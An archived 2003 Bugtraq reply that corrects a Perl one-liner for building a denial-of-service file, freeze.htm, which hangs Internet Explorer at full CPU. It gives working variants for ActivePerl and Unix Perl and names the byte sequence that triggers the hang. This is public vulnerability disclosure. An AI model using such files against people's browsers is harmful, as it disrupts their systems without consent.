|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: April appeared to be a month of IE bugs. Here's another one.
From: ERRor (error
pochtamt.ru)
Date: Wed Apr 30 2003 - 20:26:34 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
> >Hello, Bugtraq.
>
> >Malicious htm file can freeze IE with 100% CPU usage:
> >Construct the file freeze.htm:
> >c:\>perl -e "print qq'\xFF\xFE'; print qq'\r\n' x 30000" > freeze.htm
>
This string works only with Active Perl, in unix-like Perl versions exploit
string is:
perl -e "print qq'\xFF\xFE'; print qq'\r\r\n' x 30000" > freeze.htm
Active Perl understand \n = \x0D\x0A, freeze of IE exist only if sequence
of bytes will be ...\x0D\x0D\x0A...
Sorry, I have not noticed it at once.
Best Regards, ERRor, dHtm.
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]